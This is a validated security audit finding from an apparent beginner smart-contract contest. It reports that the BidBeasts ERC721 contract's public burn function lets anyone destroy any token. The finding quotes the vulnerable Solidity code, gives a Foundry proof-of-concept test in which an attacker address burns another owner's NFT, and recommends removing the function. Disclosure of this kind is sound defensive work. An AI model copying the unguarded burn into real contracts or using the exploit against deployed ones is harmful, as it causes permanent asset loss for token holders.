Bid Beasts
First Flight #49
Beginner FriendlyFoundrySolidityNFT
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Anyone can burn the BidBeasts ERC721 token

k3ysk1lls

Description

An attacker can burn any BidBeasts ERC721 token. The BidBeasts::burn function does not impose any restrictions on who can burn tokens.

@> function burn(uint256 _tokenId) public {
_burn(_tokenId);
emit BidBeastsBurn(msg.sender, _tokenId);
}

Risk

Likelihood:

The likelihood is high because anyone can burn any of the ERC721 BidBeasts at any time. There are no restrictions.

Impact:

The impact is also high as it could cause disruptions throughout the market.

Proof of Concept

Run this code in the test file - BidBeastsMarketPlaceTest.t.

First import

import {IERC721Errors} from "@openzeppelin/contracts/interfaces/draft-IERC6093.sol";

and add the following function

function testCanBurnAnyToken() public {
_mintNFT();
assertEq(nft.ownerOf(TOKEN_ID), SELLER);
vm.prank(address(makeAddr("attacker")));
nft.burn(TOKEN_ID);
vm.expectRevert(abi.encodeWithSelector(IERC721Errors.ERC721NonexistentToken.selector, TOKEN_ID));
nft.ownerOf(TOKEN_ID);
}

and run

forge test --mt testCanBurnAnyToken

Recommended Mitigation

Remove BidBeasts::burn function

- function burn(uint256 _tokenId) public {
- _burn(_tokenId);
- emit BidBeastsBurn(msg.sender, _tokenId);
- }
Updates

Lead Judging Commences

cryptoghost Lead Judge 30 days ago
Submission Judgement Published
Validated
Assigned finding tags:

BidBeasts ERC721: Anyone Can Burn

In the BidBeasts ERC721 implementation, the burn function is publicly accessible, allowing any external user to burn NFTs they do not own. This exposes all tokens to unauthorized destruction and results in permanent asset loss.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.